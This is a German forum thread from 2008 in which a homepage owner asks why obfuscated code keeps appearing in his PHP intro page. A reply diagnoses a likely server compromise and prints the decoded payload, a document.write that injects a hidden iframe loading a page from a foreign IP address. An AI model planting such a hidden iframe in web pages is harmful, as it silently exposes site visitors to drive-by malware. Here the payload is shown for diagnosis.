|
The Edge
aus der Asche
offline
OC God
22 Jahre dabei !
Intel Core 2 Duo
2500 MHz @ 3200 MHz mit 1.485 Volt
|
     
ich habe hier ein script - sozusagen der introscreen meiner homepage.
allerdings habe ich alle 2 wochen das problem, dass irgendwer oder irgendwas sich in dieses script einhackt und das script so mit einem ziemlich dämlichen schrottinject lahmlegt.
(es sei dazu gesagt, dass ich scriptaculous auf meiner page verwende!... ich weiss nicht, ob/inwiefern es damit zusammenhängt.)
das php-script liegt eigentlich an der position http://seeeeeeeeeb.got.zlashed.com/index.php (dort habe ich z.Zt. alles an js auskommentiert)
hier der link zum script, wenn die injection schon passiert ist.
kaputte index.php
jemand ne idee, wie die injection in zeile 38 (das komische ding mit vielen hex-zahlen o.s.ä. direkt nach dem body-tag) da reingelangen kann?
methode, sicherheitslücke, grundkenntnisse in dem bereich - egal was ihr wisst hauts hier rein, damit ich herausfinde, wie das angehen kann, dass jemand/etwas in ein serverseitiges script etwas einhackt.
helft einem alten forumsoppa.
gruß!
|
Beiträge gesamt: 8661 | Durchschnitt: 1 Postings pro Tag
Registrierung: Okt. 2002 | Dabei seit: 8067 Tagen | Erstellt: 4:31 am 22. Mai 2008
|
|
|
|
|
|
|
|
|
|
|
|
wakko0816
offline
OC God
20 Jahre dabei !
Intel Core i5
3500 MHz @ 4200 MHz
55°C mit 1.18 Volt
|
Zitat von The Edge um 0:44 am Mai 23, 2008
chmods sind auf 644/755, aber das spielt ja auch gar keine rolle, für den ftpzugriff braucht man ein passwort und da die scripts serverseitig geparsed werden, kann per http da schlecht dran manipuliert werden.
|
Gut. Wenn Dir das so klar ist, wieso kommst Du dann auf die verworrene Idee,
dass Du ein Opfer von Skript-Injection bist? Dass da plötzlich seltsamer
Javascript-Code in Deinem PHP-Skript steht hat auf jeden Fall eine andere
Ursache.
Wenn Dein Kumpel so viel drauf hat, hat er bestimmt ein Intrusion-Detection-
System (z.B. AIDE o.ä.) auf dem Server laufen. Wenn ja, könnte man mal
den Ordner für Deinen vHost mit in die Überwachung aufnehmen.
Was läuft denn da noch auf dem Server? Evtl. PHPbb? Gibt etliche PHP-
Skripte, über die Angreifer ganz leicht Zugriff auf die Konsole kriegen. 
Übersetzt sieht das Javascript übrigens so aus:
Code
document.write('<iframe name=95536a src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*196452)+'fc\' width=612 height=321 style=\'display: none\'></iframe>');
|
Laut "whois" darfst Du Dich bei irgendwelchen Leuten in Sankt Petersburg
beschweren. Und die haben sich schon einigermaßen Mühe gemacht, um den
Code für den iFrame zu verstecken....
|
Beiträge gesamt: 1146 | Durchschnitt: 0 Postings pro Tag
Registrierung: Aug. 2004 | Dabei seit: 7381 Tagen | Erstellt: 2:55 am 23. Mai 2008
|
|
|
|
|
|
